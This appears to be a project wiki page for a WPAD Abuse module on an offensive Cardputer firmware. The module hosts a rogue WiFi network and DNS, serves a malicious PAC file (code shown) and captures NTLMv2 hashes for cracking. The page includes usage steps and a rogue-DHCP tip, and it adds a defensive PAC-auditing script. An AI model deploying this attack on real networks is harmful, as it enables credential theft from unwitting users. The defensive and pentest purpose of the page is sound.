wpad abuse
7h30th3r0n3 edited this page Sep 7, 2025 · 6 revisions
The WPAD Abuse module exploits the Web Proxy Auto-Discovery Protocol (WPAD) to capture NTLMv2 authentication hashes.
When a device tries to auto-discover a proxy (via wpad.dat), the Cardputer answers with a
malicious proxy configuration. If the device authenticates, the hash is intercepted and stored.
- 🛜 Starts a wifi network
- 📡 Starts a fake DNS server (port 53)
- 🌐 Runs an HTTP server (port 80)
- 📝 Serves `wpad.dat` (PAC file)
- 🔐 Captures NTLMv2 hashes when clients attempt authentication
| Path | Purpose |
|---|---|
| (firmware) `wpad.dat` | PAC served directly from hardcoded value |
| `/evil/NTLM/ntlm_hashes.txt` | Captured NTLMv2 hashes (Hashcat-style lines) |
```javascript
function FindProxyForURL(url, host) {
  return "PROXY 192.168.4.1:80; DIRECT";
}
```
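From the defender's side, a PAC like the one above can be recognised by the proxy it hands out. The following is an added example, not Evil-Cardputer code: it statically audits the text of a fetched `wpad.dat` and reports any proxy target that is not on an approved list. The allowlist entry `proxy.corp.example:8080`, the function names and the second sample PAC are assumptions made for the illustration.

```javascript
// Added example (not project code): static audit of a fetched wpad.dat.
// The PAC text is only parsed, never executed.
// APPROVED_PROXIES is a constructed allowlist; replace it with your real proxies.
const APPROVED_PROXIES = new Set(["proxy.corp.example:8080"]);

// Pull every quoted string literal out of the PAC source.
function stringLiterals(pacSource) {
  const literals = [];
  const re = /"((?:[^"\\]|\\.)*)"|'((?:[^'\\]|\\.)*)'/g;
  let m;
  while ((m = re.exec(pacSource)) !== null) {
    literals.push(m[1] !== undefined ? m[1] : m[2]);
  }
  return literals;
}

// Parse one PAC return value such as "PROXY 192.168.4.1:80; DIRECT".
function parseDirectives(value) {
  const out = [];
  for (const part of value.split(";")) {
    const m = /^\s*(DIRECT|PROXY|SOCKS[45]?|HTTPS?)(?:\s+(\S+))?\s*$/i.exec(part);
    if (!m) continue; // not a PAC directive (e.g. a hostname pattern)
    const type = m[1].toUpperCase();
    if (type === "DIRECT") out.push({ type, target: null });
    else if (m[2]) out.push({ type, target: m[2].toLowerCase() });
  }
  return out;
}

// Return every proxy target in the PAC that is not on the allowlist.
function auditPac(pacSource, approved = APPROVED_PROXIES) {
  const findings = [];
  for (const literal of stringLiterals(pacSource)) {
    for (const d of parseDirectives(literal)) {
      if (d.type !== "DIRECT" && !approved.has(d.target)) {
        findings.push({ type: d.type, target: d.target, literal });
      }
    }
  }
  return findings;
}

// Sample inputs: the PAC shown on this page, and a constructed approved one.
const PAGE_PAC = 'function FindProxyForURL(url, host) {\n  return "PROXY 192.168.4.1:80; DIRECT";\n}';
const CORP_PAC = 'function FindProxyForURL(url, host) {\n  if (isPlainHostName(host)) return "DIRECT";\n  return "PROXY proxy.corp.example:8080";\n}';

console.log(auditPac(PAGE_PAC)); // one finding: PROXY 192.168.4.1:80
console.log(auditPac(CORP_PAC)); // no findings
```

Because the check reads string literals only, a PAC that assembles its proxy string at run time would need to be evaluated in an isolated environment instead.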
- Boot your Evil-Cardputer
- Select WPAD Abuse from the main menu
- A WiFi network is started and waits for clients
- Wait for a connected client to request `wpad.dat`
- Captured NTLMv2 hashes are saved automatically to SD
- Press BACKSPACE to exit and return to the menu
💡 Tip: Combine with Rogue DHCP AP to increase capture chances by sending a 252 option through DHCP.
- ✅ NTLMv2 counter increases when a new hash is captured
- 👤 Last user/domain/client displayed
- 📡 Radar-style animation while waiting
- 🔙 Press BACKSPACE to stop
- Use the menu Clean NTLMv2 duplicate to remove duplicates
- Or manually clear `/evil/ntlm_hashes.txt`
- Works best in AP mode with DNS hijack
- Most effective on Windows with auto proxy enabled
- Some applications can trigger the NTLMv2 authentication (Teams/Outlook/TeamViewer/etc.)

⚠️ Some clients (e.g., Firefox) ignore WPAD by default

⚠️ If the client has never used NTLMv2 before, it should send an NTLMv2 response without a user, which is uncrackable; these are filtered
This module is strictly for authorized penetration testing, research, and educational purposes.
Unauthorized use may break the law.